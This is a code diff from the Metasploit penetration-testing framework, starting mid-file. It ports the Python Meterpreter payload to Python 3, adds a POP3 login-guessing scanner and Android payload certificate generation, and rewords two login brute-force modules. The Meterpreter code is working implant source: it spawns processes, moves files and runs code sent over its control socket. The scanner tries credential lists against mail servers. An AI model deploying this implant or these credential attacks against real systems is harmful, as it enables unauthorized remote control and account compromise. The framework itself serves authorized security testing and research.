result = ctypes.windll.advapi32.RegSetValueExA(hkey, ctypes.byref(value_name), 0, value_type, value_data, len(value_data))
|
||||||
return result, response
|
return result, response
|
||||||
|
|
||||||
@meterpreter.register_function_windll
|
@meterpreter.register_function_windll
|
||||||
|
|
Binary file not shown.
|
@ -1,12 +1,5 @@
|
||||||
#!/usr/bin/python
|
#!/usr/bin/python
|
||||||
import code
|
import code
|
||||||
try:
|
|
||||||
import ctypes
|
|
||||||
except:
|
|
||||||
has_windll = False
|
|
||||||
else:
|
|
||||||
has_windll = hasattr(ctypes, 'windll')
|
|
||||||
|
|
||||||
import os
|
import os
|
||||||
import random
|
import random
|
||||||
import select
|
import select
|
||||||
|
@ -15,10 +8,30 @@ import struct
|
||||||
import subprocess
|
import subprocess
|
||||||
import sys
|
import sys
|
||||||
import threading
|
import threading
|
||||||
|
import time
|
||||||
|
import traceback
|
||||||
|
|
||||||
|
try:
|
||||||
|
import ctypes
|
||||||
|
except ImportError:
|
||||||
|
has_windll = False
|
||||||
|
else:
|
||||||
|
has_windll = hasattr(ctypes, 'windll')
|
||||||
|
|
||||||
|
if sys.version_info[0] < 3:
|
||||||
|
is_bytes = lambda obj: issubclass(obj.__class__, str)
|
||||||
|
bytes = lambda *args: str(*args[:1])
|
||||||
|
NULL_BYTE = '\x00'
|
||||||
|
else:
|
||||||
|
is_bytes = lambda obj: issubclass(obj.__class__, bytes)
|
||||||
|
str = lambda x: __builtins__['str'](x, 'UTF-8')
|
||||||
|
NULL_BYTE = bytes('\x00', 'UTF-8')
|
||||||
|
|
||||||
#
|
#
|
||||||
# Constants
|
# Constants
|
||||||
#
|
#
|
||||||
|
DEBUGGING = False
|
||||||
|
|
||||||
PACKET_TYPE_REQUEST = 0
|
PACKET_TYPE_REQUEST = 0
|
||||||
PACKET_TYPE_RESPONSE = 1
|
PACKET_TYPE_RESPONSE = 1
|
||||||
PACKET_TYPE_PLAIN_REQUEST = 10
|
PACKET_TYPE_PLAIN_REQUEST = 10
|
||||||
|
@ -100,6 +113,7 @@ TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
|
||||||
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
|
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
|
||||||
|
|
||||||
EXPORTED_SYMBOLS = {}
|
EXPORTED_SYMBOLS = {}
|
||||||
|
EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING
|
||||||
|
|
||||||
def export(symbol):
|
def export(symbol):
|
||||||
EXPORTED_SYMBOLS[symbol.__name__] = symbol
|
EXPORTED_SYMBOLS[symbol.__name__] = symbol
|
||||||
|
@ -107,7 +121,7 @@ def export(symbol):
|
||||||
|
|
||||||
def generate_request_id():
|
def generate_request_id():
|
||||||
chars = 'abcdefghijklmnopqrstuvwxyz'
|
chars = 'abcdefghijklmnopqrstuvwxyz'
|
||||||
return ''.join(random.choice(chars) for x in xrange(32))
|
return ''.join(random.choice(chars) for x in range(32))
|
||||||
|
|
||||||
@export
|
@export
|
||||||
def inet_pton(family, address):
|
def inet_pton(family, address):
|
||||||
|
@ -125,25 +139,6 @@ def inet_pton(family, address):
|
||||||
return ''.join(map(chr, lpAddress[8:24]))
|
return ''.join(map(chr, lpAddress[8:24]))
|
||||||
raise Exception('no suitable inet_pton functionality is available')
|
raise Exception('no suitable inet_pton functionality is available')
|
||||||
|
|
||||||
@export
|
|
||||||
def packet_get_tlv(pkt, tlv_type):
|
|
||||||
offset = 0
|
|
||||||
while (offset < len(pkt)):
|
|
||||||
tlv = struct.unpack('>II', pkt[offset:offset+8])
|
|
||||||
if (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type:
|
|
||||||
val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
|
|
||||||
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
|
|
||||||
val = val.split('\x00', 1)[0]
|
|
||||||
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
|
|
||||||
val = struct.unpack('>I', val)[0]
|
|
||||||
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
|
|
||||||
val = bool(struct.unpack('b', val)[0])
|
|
||||||
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
|
|
||||||
pass
|
|
||||||
return {'type':tlv[1], 'length':tlv[0], 'value':val}
|
|
||||||
offset += tlv[0]
|
|
||||||
return {}
|
|
||||||
|
|
||||||
@export
|
@export
|
||||||
def packet_enum_tlvs(pkt, tlv_type = None):
|
def packet_enum_tlvs(pkt, tlv_type = None):
|
||||||
offset = 0
|
offset = 0
|
||||||
|
@ -152,7 +147,7 @@ def packet_enum_tlvs(pkt, tlv_type = None):
|
||||||
if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type):
|
if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type):
|
||||||
val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
|
val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
|
||||||
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
|
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
|
||||||
val = val.split('\x00', 1)[0]
|
val = str(val.split(NULL_BYTE, 1)[0])
|
||||||
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
|
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
|
||||||
val = struct.unpack('>I', val)[0]
|
val = struct.unpack('>I', val)[0]
|
||||||
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
|
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
|
||||||
|
@ -163,6 +158,14 @@ def packet_enum_tlvs(pkt, tlv_type = None):
|
||||||
offset += tlv[0]
|
offset += tlv[0]
|
||||||
raise StopIteration()
|
raise StopIteration()
|
||||||
|
|
||||||
|
@export
|
||||||
|
def packet_get_tlv(pkt, tlv_type):
|
||||||
|
try:
|
||||||
|
tlv = list(packet_enum_tlvs(pkt, tlv_type))[0]
|
||||||
|
except IndexError:
|
||||||
|
return {}
|
||||||
|
return tlv
|
||||||
|
|
||||||
@export
|
@export
|
||||||
def tlv_pack(*args):
|
def tlv_pack(*args):
|
||||||
if len(args) == 2:
|
if len(args) == 2:
|
||||||
|
@ -170,20 +173,33 @@ def tlv_pack(*args):
|
||||||
else:
|
else:
|
||||||
tlv = args[0]
|
tlv = args[0]
|
||||||
data = ""
|
data = ""
|
||||||
if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
|
if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
|
||||||
data = struct.pack('>II', 8 + len(tlv['value']) + 1, tlv['type']) + tlv['value'] + '\x00'
|
|
||||||
elif (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
|
|
||||||
data = struct.pack('>III', 12, tlv['type'], tlv['value'])
|
data = struct.pack('>III', 12, tlv['type'], tlv['value'])
|
||||||
elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
|
elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
|
||||||
data = struct.pack('>II', 9, tlv['type']) + chr(int(bool(tlv['value'])))
|
data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(tlv['value']))), 'UTF-8')
|
||||||
elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
|
else:
|
||||||
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
|
value = tlv['value']
|
||||||
elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
|
if not is_bytes(value):
|
||||||
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
|
value = bytes(value, 'UTF-8')
|
||||||
elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
|
if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
|
||||||
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
|
data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE
|
||||||
|
elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
|
||||||
|
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
|
||||||
|
elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
|
||||||
|
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
|
||||||
|
elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
|
||||||
|
data = struct.pack('>II', 8 + len(value), tlv['type']) + value
|
||||||
return data
|
return data
|
||||||
|
|
||||||
|
#@export
|
||||||
|
class MeterpreterFile(object):
|
||||||
|
def __init__(self, file_obj):
|
||||||
|
self.file_obj = file_obj
|
||||||
|
|
||||||
|
def __getattr__(self, name):
|
||||||
|
return getattr(self.file_obj, name)
|
||||||
|
export(MeterpreterFile)
|
||||||
|
|
||||||
#@export
|
#@export
|
||||||
class MeterpreterSocket(object):
|
class MeterpreterSocket(object):
|
||||||
def __init__(self, sock):
|
def __init__(self, sock):
|
||||||
|
@ -208,11 +224,11 @@ class STDProcessBuffer(threading.Thread):
|
||||||
threading.Thread.__init__(self)
|
threading.Thread.__init__(self)
|
||||||
self.std = std
|
self.std = std
|
||||||
self.is_alive = is_alive
|
self.is_alive = is_alive
|
||||||
self.data = ''
|
self.data = bytes()
|
||||||
self.data_lock = threading.RLock()
|
self.data_lock = threading.RLock()
|
||||||
|
|
||||||
def run(self):
|
def run(self):
|
||||||
for byte in iter(lambda: self.std.read(1), ''):
|
for byte in iter(lambda: self.std.read(1), bytes()):
|
||||||
self.data_lock.acquire()
|
self.data_lock.acquire()
|
||||||
self.data += byte
|
self.data += byte
|
||||||
self.data_lock.release()
|
self.data_lock.release()
|
||||||
|
@ -220,15 +236,20 @@ class STDProcessBuffer(threading.Thread):
|
||||||
def is_read_ready(self):
|
def is_read_ready(self):
|
||||||
return len(self.data) != 0
|
return len(self.data) != 0
|
||||||
|
|
||||||
def read(self, l = None):
|
def peek(self, l = None):
|
||||||
data = ''
|
data = bytes()
|
||||||
self.data_lock.acquire()
|
self.data_lock.acquire()
|
||||||
if l == None:
|
if l == None:
|
||||||
data = self.data
|
data = self.data
|
||||||
self.data = ''
|
|
||||||
else:
|
else:
|
||||||
data = self.data[0:l]
|
data = self.data[0:l]
|
||||||
self.data = self.data[l:]
|
self.data_lock.release()
|
||||||
|
return data
|
||||||
|
|
||||||
|
def read(self, l = None):
|
||||||
|
self.data_lock.acquire()
|
||||||
|
data = self.peek(l)
|
||||||
|
self.data = self.data[len(data):]
|
||||||
self.data_lock.release()
|
self.data_lock.release()
|
||||||
return data
|
return data
|
||||||
|
|
||||||
|
@ -236,12 +257,25 @@ class STDProcessBuffer(threading.Thread):
|
||||||
class STDProcess(subprocess.Popen):
|
class STDProcess(subprocess.Popen):
|
||||||
def __init__(self, *args, **kwargs):
|
def __init__(self, *args, **kwargs):
|
||||||
subprocess.Popen.__init__(self, *args, **kwargs)
|
subprocess.Popen.__init__(self, *args, **kwargs)
|
||||||
|
self.echo_protection = False
|
||||||
|
|
||||||
def start(self):
|
def start(self):
|
||||||
self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None)
|
self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None)
|
||||||
self.stdout_reader.start()
|
self.stdout_reader.start()
|
||||||
self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
|
self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
|
||||||
self.stderr_reader.start()
|
self.stderr_reader.start()
|
||||||
|
|
||||||
|
def write(self, channel_data):
|
||||||
|
self.stdin.write(channel_data)
|
||||||
|
self.stdin.flush()
|
||||||
|
if self.echo_protection:
|
||||||
|
end_time = time.time() + 0.5
|
||||||
|
out_data = bytes()
|
||||||
|
while (time.time() < end_time) and (out_data != channel_data):
|
||||||
|
if self.stdout_reader.is_read_ready():
|
||||||
|
out_data = self.stdout_reader.peek(len(channel_data))
|
||||||
|
if out_data == channel_data:
|
||||||
|
self.stdout_reader.read(len(channel_data))
|
||||||
export(STDProcess)
|
export(STDProcess)
|
||||||
|
|
||||||
class PythonMeterpreter(object):
|
class PythonMeterpreter(object):
|
||||||
|
@ -251,7 +285,7 @@ class PythonMeterpreter(object):
|
||||||
self.channels = {}
|
self.channels = {}
|
||||||
self.interact_channels = []
|
self.interact_channels = []
|
||||||
self.processes = {}
|
self.processes = {}
|
||||||
for func in filter(lambda x: x.startswith('_core'), dir(self)):
|
for func in list(filter(lambda x: x.startswith('_core'), dir(self))):
|
||||||
self.extension_functions[func[1:]] = getattr(self, func)
|
self.extension_functions[func[1:]] = getattr(self, func)
|
||||||
self.running = True
|
self.running = True
|
||||||
|
|
||||||
|
@ -265,6 +299,7 @@ class PythonMeterpreter(object):
|
||||||
return func
|
return func
|
||||||
|
|
||||||
def add_channel(self, channel):
|
def add_channel(self, channel):
|
||||||
|
assert(isinstance(channel, (subprocess.Popen, MeterpreterFile, MeterpreterSocket)))
|
||||||
idx = 0
|
idx = 0
|
||||||
while idx in self.channels:
|
while idx in self.channels:
|
||||||
idx += 1
|
idx += 1
|
||||||
|
@ -286,7 +321,7 @@ class PythonMeterpreter(object):
|
||||||
break
|
break
|
||||||
req_length, req_type = struct.unpack('>II', request)
|
req_length, req_type = struct.unpack('>II', request)
|
||||||
req_length -= 8
|
req_length -= 8
|
||||||
request = ''
|
request = bytes()
|
||||||
while len(request) < req_length:
|
while len(request) < req_length:
|
||||||
request += self.socket.recv(4096)
|
request += self.socket.recv(4096)
|
||||||
response = self.create_response(request)
|
response = self.create_response(request)
|
||||||
|
@ -294,17 +329,17 @@ class PythonMeterpreter(object):
|
||||||
else:
|
else:
|
||||||
channels_for_removal = []
|
channels_for_removal = []
|
||||||
# iterate over the keys because self.channels could be modified if one is closed
|
# iterate over the keys because self.channels could be modified if one is closed
|
||||||
channel_ids = self.channels.keys()
|
channel_ids = list(self.channels.keys())
|
||||||
for channel_id in channel_ids:
|
for channel_id in channel_ids:
|
||||||
channel = self.channels[channel_id]
|
channel = self.channels[channel_id]
|
||||||
data = ''
|
data = bytes()
|
||||||
if isinstance(channel, STDProcess):
|
if isinstance(channel, STDProcess):
|
||||||
if not channel_id in self.interact_channels:
|
if not channel_id in self.interact_channels:
|
||||||
continue
|
continue
|
||||||
if channel.stdout_reader.is_read_ready():
|
if channel.stderr_reader.is_read_ready():
|
||||||
data = channel.stdout_reader.read()
|
|
||||||
elif channel.stderr_reader.is_read_ready():
|
|
||||||
data = channel.stderr_reader.read()
|
data = channel.stderr_reader.read()
|
||||||
|
elif channel.stdout_reader.is_read_ready():
|
||||||
|
data = channel.stdout_reader.read()
|
||||||
elif channel.poll() != None:
|
elif channel.poll() != None:
|
||||||
self.handle_dead_resource_channel(channel_id)
|
self.handle_dead_resource_channel(channel_id)
|
||||||
elif isinstance(channel, MeterpreterSocketClient):
|
elif isinstance(channel, MeterpreterSocketClient):
|
||||||
|
@ -312,7 +347,7 @@ class PythonMeterpreter(object):
|
||||||
try:
|
try:
|
||||||
d = channel.recv(1)
|
d = channel.recv(1)
|
||||||
except socket.error:
|
except socket.error:
|
||||||
d = ''
|
d = bytes()
|
||||||
if len(d) == 0:
|
if len(d) == 0:
|
||||||
self.handle_dead_resource_channel(channel_id)
|
self.handle_dead_resource_channel(channel_id)
|
||||||
break
|
break
|
||||||
|
@ -357,13 +392,13 @@ class PythonMeterpreter(object):
|
||||||
data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
|
data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
|
||||||
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
|
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
|
||||||
return ERROR_FAILURE
|
return ERROR_FAILURE
|
||||||
preloadlib_methods = self.extension_functions.keys()
|
preloadlib_methods = list(self.extension_functions.keys())
|
||||||
symbols_for_extensions = {'meterpreter':self}
|
symbols_for_extensions = {'meterpreter':self}
|
||||||
symbols_for_extensions.update(EXPORTED_SYMBOLS)
|
symbols_for_extensions.update(EXPORTED_SYMBOLS)
|
||||||
i = code.InteractiveInterpreter(symbols_for_extensions)
|
i = code.InteractiveInterpreter(symbols_for_extensions)
|
||||||
i.runcode(compile(data_tlv['value'], '', 'exec'))
|
i.runcode(compile(data_tlv['value'], '', 'exec'))
|
||||||
postloadlib_methods = self.extension_functions.keys()
|
postloadlib_methods = list(self.extension_functions.keys())
|
||||||
new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)
|
new_methods = list(filter(lambda x: x not in preloadlib_methods, postloadlib_methods))
|
||||||
for method in new_methods:
|
for method in new_methods:
|
||||||
response += tlv_pack(TLV_TYPE_METHOD, method)
|
response += tlv_pack(TLV_TYPE_METHOD, method)
|
||||||
return ERROR_SUCCESS, response
|
return ERROR_SUCCESS, response
|
||||||
|
@ -386,10 +421,10 @@ class PythonMeterpreter(object):
|
||||||
if channel_id not in self.channels:
|
if channel_id not in self.channels:
|
||||||
return ERROR_FAILURE, response
|
return ERROR_FAILURE, response
|
||||||
channel = self.channels[channel_id]
|
channel = self.channels[channel_id]
|
||||||
if isinstance(channel, file):
|
if isinstance(channel, subprocess.Popen):
|
||||||
channel.close()
|
|
||||||
elif isinstance(channel, subprocess.Popen):
|
|
||||||
channel.kill()
|
channel.kill()
|
||||||
|
elif isinstance(channel, MeterpreterFile):
|
||||||
|
channel.close()
|
||||||
elif isinstance(channel, MeterpreterSocket):
|
elif isinstance(channel, MeterpreterSocket):
|
||||||
channel.close()
|
channel.close()
|
||||||
else:
|
else:
|
||||||
|
@ -405,7 +440,7 @@ class PythonMeterpreter(object):
|
||||||
return ERROR_FAILURE, response
|
return ERROR_FAILURE, response
|
||||||
channel = self.channels[channel_id]
|
channel = self.channels[channel_id]
|
||||||
result = False
|
result = False
|
||||||
if isinstance(channel, file):
|
if isinstance(channel, MeterpreterFile):
|
||||||
result = channel.tell() >= os.fstat(channel.fileno()).st_size
|
result = channel.tell() >= os.fstat(channel.fileno()).st_size
|
||||||
response += tlv_pack(TLV_TYPE_BOOL, result)
|
response += tlv_pack(TLV_TYPE_BOOL, result)
|
||||||
return ERROR_SUCCESS, response
|
return ERROR_SUCCESS, response
|
||||||
|
@ -432,13 +467,13 @@ class PythonMeterpreter(object):
|
||||||
return ERROR_FAILURE, response
|
return ERROR_FAILURE, response
|
||||||
channel = self.channels[channel_id]
|
channel = self.channels[channel_id]
|
||||||
data = ''
|
data = ''
|
||||||
if isinstance(channel, file):
|
if isinstance(channel, STDProcess):
|
||||||
data = channel.read(length)
|
|
||||||
elif isinstance(channel, STDProcess):
|
|
||||||
if channel.poll() != None:
|
if channel.poll() != None:
|
||||||
self.handle_dead_resource_channel(channel_id)
|
self.handle_dead_resource_channel(channel_id)
|
||||||
if channel.stdout_reader.is_read_ready():
|
if channel.stdout_reader.is_read_ready():
|
||||||
data = channel.stdout_reader.read(length)
|
data = channel.stdout_reader.read(length)
|
||||||
|
elif isinstance(channel, MeterpreterFile):
|
||||||
|
data = channel.read(length)
|
||||||
elif isinstance(channel, MeterpreterSocket):
|
elif isinstance(channel, MeterpreterSocket):
|
||||||
data = channel.recv(length)
|
data = channel.recv(length)
|
||||||
else:
|
else:
|
||||||
|
@ -454,13 +489,13 @@ class PythonMeterpreter(object):
|
||||||
return ERROR_FAILURE, response
|
return ERROR_FAILURE, response
|
||||||
channel = self.channels[channel_id]
|
channel = self.channels[channel_id]
|
||||||
l = len(channel_data)
|
l = len(channel_data)
|
||||||
if isinstance(channel, file):
|
if isinstance(channel, subprocess.Popen):
|
||||||
channel.write(channel_data)
|
|
||||||
elif isinstance(channel, subprocess.Popen):
|
|
||||||
if channel.poll() != None:
|
if channel.poll() != None:
|
||||||
self.handle_dead_resource_channel(channel_id)
|
self.handle_dead_resource_channel(channel_id)
|
||||||
return ERROR_FAILURE, response
|
return ERROR_FAILURE, response
|
||||||
channel.stdin.write(channel_data)
|
channel.write(channel_data)
|
||||||
|
elif isinstance(channel, MeterpreterFile):
|
||||||
|
channel.write(channel_data)
|
||||||
elif isinstance(channel, MeterpreterSocket):
|
elif isinstance(channel, MeterpreterSocket):
|
||||||
try:
|
try:
|
||||||
l = channel.send(channel_data)
|
l = channel.send(channel_data)
|
||||||
|
@ -485,13 +520,17 @@ class PythonMeterpreter(object):
|
||||||
if handler_name in self.extension_functions:
|
if handler_name in self.extension_functions:
|
||||||
handler = self.extension_functions[handler_name]
|
handler = self.extension_functions[handler_name]
|
||||||
try:
|
try:
|
||||||
#print("[*] running method {0}".format(handler_name))
|
if DEBUGGING:
|
||||||
|
print('[*] running method ' + handler_name)
|
||||||
result, resp = handler(request, resp)
|
result, resp = handler(request, resp)
|
||||||
except Exception, err:
|
except Exception:
|
||||||
#print("[-] method {0} resulted in an error".format(handler_name))
|
if DEBUGGING:
|
||||||
|
print('[-] method ' + handler_name + ' resulted in an error')
|
||||||
|
traceback.print_exc(file=sys.stderr)
|
||||||
result = ERROR_FAILURE
|
result = ERROR_FAILURE
|
||||||
else:
|
else:
|
||||||
#print("[-] method {0} was requested but does not exist".format(handler_name))
|
if DEBUGGING:
|
||||||
|
print('[-] method ' + handler_name + ' was requested but does not exist')
|
||||||
result = ERROR_FAILURE
|
result = ERROR_FAILURE
|
||||||
resp += tlv_pack(TLV_TYPE_RESULT, result)
|
resp += tlv_pack(TLV_TYPE_RESULT, result)
|
||||||
resp = struct.pack('>I', len(resp) + 4) + resp
|
resp = struct.pack('>I', len(resp) + 4) + resp
|
||||||
|
@ -499,6 +538,9 @@ class PythonMeterpreter(object):
|
||||||
|
|
||||||
if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
|
if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
|
||||||
if hasattr(os, 'setsid'):
|
if hasattr(os, 'setsid'):
|
||||||
os.setsid()
|
try:
|
||||||
|
os.setsid()
|
||||||
|
except OSError:
|
||||||
|
pass
|
||||||
met = PythonMeterpreter(s)
|
met = PythonMeterpreter(s)
|
||||||
met.run()
|
met.run()
|
||||||
|
|
|
@ -0,0 +1,75 @@
|
||||||
|
require 'metasploit/framework/login_scanner/base'
|
||||||
|
require 'metasploit/framework/login_scanner/rex_socket'
|
||||||
|
require 'metasploit/framework/tcp/client'
|
||||||
|
|
||||||
|
module Metasploit
|
||||||
|
module Framework
|
||||||
|
module LoginScanner
|
||||||
|
|
||||||
|
# This is the LoginScanner class for dealing with POP3.
|
||||||
|
# It is responsible for taking a single target, and a list of credentials
|
||||||
|
# and attempting them. It then saves the results.
|
||||||
|
class POP3
|
||||||
|
include Metasploit::Framework::LoginScanner::Base
|
||||||
|
include Metasploit::Framework::LoginScanner::RexSocket
|
||||||
|
include Metasploit::Framework::Tcp::Client
|
||||||
|
|
||||||
|
# This method attempts a single login with a single credential against the target
|
||||||
|
# @param credential [Credential] The credential object to attempt to login with
|
||||||
|
# @return [Metasploit::Framework::LoginScanner::Result] The LoginScanner Result object
|
||||||
|
def attempt_login(credential)
|
||||||
|
result_options = {
|
||||||
|
credential: credential,
|
||||||
|
status: :failed
|
||||||
|
}
|
||||||
|
|
||||||
|
disconnect if self.sock
|
||||||
|
|
||||||
|
begin
|
||||||
|
connect
|
||||||
|
select([sock],nil,nil,0.4)
|
||||||
|
# sleep(0.4)
|
||||||
|
|
||||||
|
# Check to see if we recieved an OK?
|
||||||
|
result_options[:proof] = sock.get_once
|
||||||
|
if result_options[:proof][/^\+OK.*/]
|
||||||
|
# If we received an OK we should send the USER
|
||||||
|
sock.put("USER #{credential.public}\r\n")
|
||||||
|
result_options[:proof] = sock.get_once
|
||||||
|
if result_options[:proof][/^\+OK.*/]
|
||||||
|
# If we got an OK after the username we can send the PASS
|
||||||
|
sock.put("PASS #{credential.private}\r\n")
|
||||||
|
result_options[:proof] = sock.get_once
|
||||||
|
if result_options[:proof][/^\+OK.*/]
|
||||||
|
# if the pass gives an OK, were good to go
|
||||||
|
result_options[:status] = :success
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
rescue Rex::ConnectionError, EOFError, Timeout::Error, Errno::EPIPE => e
|
||||||
|
result_options.merge!(
|
||||||
|
proof: e.message,
|
||||||
|
status: :connection_error
|
||||||
|
)
|
||||||
|
end
|
||||||
|
|
||||||
|
disconnect if self.sock
|
||||||
|
|
||||||
|
Result.new(result_options)
|
||||||
|
end
|
||||||
|
|
||||||
|
private
|
||||||
|
|
||||||
|
# (see Base#set_sane_defaults)
|
||||||
|
def set_sane_defaults
|
||||||
|
self.max_send_size ||= 0
|
||||||
|
self.send_delay ||= 0
|
||||||
|
self.port ||= 110
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
|
@ -61,7 +61,7 @@ module Metasploit
|
||||||
status: :connection_error
|
status: :connection_error
|
||||||
)
|
)
|
||||||
end
|
end
|
||||||
rescue ::EOFError, Rex::AddressInUse, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error => e
|
rescue ::EOFError, Errno::ENOTCONN, Rex::AddressInUse, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error => e
|
||||||
result_options.merge!(
|
result_options.merge!(
|
||||||
proof: e.message,
|
proof: e.message,
|
||||||
status: :connection_error
|
status: :connection_error
|
||||||
|
|
|
@ -31,5 +31,36 @@ module Msf::Payload::Dalvik
|
||||||
[str.length].pack("N") + str
|
[str.length].pack("N") + str
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def string_sub(data, placeholder="", input="")
|
||||||
|
data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
|
||||||
|
end
|
||||||
|
|
||||||
|
def generate_cert
|
||||||
|
x509_name = OpenSSL::X509::Name.parse(
|
||||||
|
"C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
|
||||||
|
)
|
||||||
|
key = OpenSSL::PKey::RSA.new(1024)
|
||||||
|
cert = OpenSSL::X509::Certificate.new
|
||||||
|
cert.version = 2
|
||||||
|
cert.serial = 1
|
||||||
|
cert.subject = x509_name
|
||||||
|
cert.issuer = x509_name
|
||||||
|
cert.public_key = key.public_key
|
||||||
|
|
||||||
|
# Some time within the last 3 years
|
||||||
|
cert.not_before = Time.now - rand(3600*24*365*3)
|
||||||
|
|
||||||
|
# From http://developer.android.com/tools/publishing/app-signing.html
|
||||||
|
# """
|
||||||
|
# A validity period of more than 25 years is recommended.
|
||||||
|
#
|
||||||
|
# If you plan to publish your application(s) on Google Play, note
|
||||||
|
# that a validity period ending after 22 October 2033 is a
|
||||||
|
# requirement. You can not upload an application if it is signed
|
||||||
|
# with a key whose validity expires before that date.
|
||||||
|
# """
|
||||||
|
cert.not_after = cert.not_before + 3600*24*365*20 # 20 years
|
||||||
|
return cert, key
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -13,10 +13,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'EtherPAD Duo Login Brute Force Utility',
|
'Name' => 'EtherPAD Duo Login Bruteforce Utility',
|
||||||
'Description' => %{
|
'Description' => %{
|
||||||
This module scans for EtherPAD Duo login portal, and
|
This module scans for EtherPAD Duo login portal, and
|
||||||
performs a login brute force attack to identify valid credentials.
|
performs a login bruteforce attack to identify valid credentials.
|
||||||
},
|
},
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
|
@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("#{peer} - Starting login brute force...")
|
print_status("#{peer} - Starting login bruteforce...")
|
||||||
each_user_pass do |user, pass|
|
each_user_pass do |user, pass|
|
||||||
do_login(user, pass)
|
do_login(user, pass)
|
||||||
end
|
end
|
||||||
|
|
|
@ -14,10 +14,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'PocketPAD Login Brute Force Utility',
|
'Name' => 'PocketPAD Login Bruteforce Force Utility',
|
||||||
'Description' => %{
|
'Description' => %{
|
||||||
This module scans for PocketPAD login portal, and
|
This module scans for PocketPAD login portal, and
|
||||||
performs a login brute force attack to identify valid credentials.
|
performs a login bruteforce attack to identify valid credentials.
|
||||||
},
|
},
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
|
@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
return
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("#{peer} - Starting login brute force...")
|
print_status("#{peer} - Starting login bruteforce...")
|
||||||
each_user_pass do |user, pass|
|
each_user_pass do |user, pass|
|
||||||
do_login(user, pass)
|
do_login(user, pass)
|
||||||
end
|
end
|
||||||
|
|
|
